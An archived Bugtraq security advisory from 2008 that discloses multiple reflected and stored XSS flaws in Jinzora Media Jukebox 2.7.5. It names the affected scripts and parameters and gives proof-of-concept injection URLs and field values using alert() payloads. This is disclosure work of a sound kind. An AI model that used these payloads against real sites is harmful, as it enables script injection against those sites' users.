bugtraq - [DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives

Hash Suite: Windows password security audit tool. GUI, reports in PDF.

[<prev] [next>] [day] [month] [year] [list]

Date: Tue, 19 Feb 2008 19:15:15 +0300
From: Digital Security Research Group <research@...c.ru>
To: bugtraq@...urityfocus.com, vuln@...unia.com,
	packet@...ketstormsecurity.org
Subject: [DSECRG-08-016] Jinzora 2.7.5 Multiple XSS

Digital Security Research Group [DSecRG] Advisory       #DSECRG-08-016

Application:                    Jinzora Media Jukebox
Versions Affected:              2.7.5
Vendor URL:                     http://www.jinzora.com/
Bugs:                           Multiple XSS Injections
Exploits:                       YES
Reported:                       04.02.2008
Second report:                  12.02.2008
Vendor response:                NONE
Date of Public Advisory:        19.02.2008
Authors:                        Alexandr Polyakov, Stas Svistunovich
                                Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)

Description
***********

Jinzora system has multiple security vulnerabilities:

1. Linked XSS
2. Stored XSS

Details
*******

1. Multiple linked XSS vulnerabilities found. Attacker can inject XSS in URL string.

1.1 Linked XSS vulnerabiliies found in index.php.

GET parameters "frontend", "set_frontend", "jz_path", "theme", "set_theme".

Example:

http://[server]/[installdir]/index.php?frontend=<IMG SRC="javascript:alert('DSecRG XSS')">

1.2 Linked XSS vulnerabilities found in ajax_request.php.

GET parameters "frontend", "theme", "language".

Example:

http://[server]/[installdir]/ajax_request.php?language=<IMG SRC="javascript:alert('DSecRG XSS')">

1.3 Linked XSS vulnerability found in slim.php. GET parameter "jz_path".

Example:

http://[server]/[installdir]/slim.php?jz_path=<IMG SRC="javascript:alert('DSecRG XSS')">

1.4 Linked XSS vulnerabilities found in popup.php.

GET parameters "frontend", "theme", "jz_path".

Example:

http://[server]/[installdir]/popup.php?theme=<IMG SRC="javascript:alert('DSecRG XSS')">

1.5 Linked XSS in Path vulnerability found in index.php and slim.php.

Example:

http://[server]/[installdir]/index.php/"><script>alert('DSecRG XSS')</script>

---------------------------------------------------------------------

2. Stored XSS

2.1 Vulnerability found in script popup.php?ptype=sitenews in post parameter name "siteNewsData" 

Example:

siteNewsData = </textarea><script>alert('DSecRG XSS')</script>

2.1 Vulnerability found in script popup.php?ptype=playlistedit in post parameter name "query" 

Example:

query = <script>alert('DSecRG XSS')</script>

About
*****

Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.

Contact:        research [at] dsec [dot] ru
                http://www.dsec.ru (in Russian)

-- 

  Digital Security Research Group  mailto:research@...c.ru